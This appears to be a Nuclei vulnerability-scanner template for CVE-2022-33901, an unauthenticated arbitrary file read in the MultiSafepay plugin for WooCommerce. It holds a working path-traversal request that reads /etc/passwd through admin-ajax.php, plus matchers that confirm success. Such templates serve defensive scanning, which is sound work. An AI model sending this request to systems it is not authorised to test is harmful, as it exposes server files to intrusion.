42 lines
1.3 KiB
YAML
42 lines
1.3 KiB
YAML
id: CVE-2022-33901
|
|
|
|
info:
|
|
name: MultiSafepay plugin for WooCommerce <= 4.13.1 - Unauthenticated Arbitrary File Read
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress.
|
|
reference:
|
|
- https://wordpress.org/plugins/multisafepay/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-33901
|
|
- https://wordpress.org/plugins/multisafepay/#developers
|
|
- https://patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-33901
|
|
metadata:
|
|
verified: "true"
|
|
tags: cve,cve2022,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/octet-stream"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|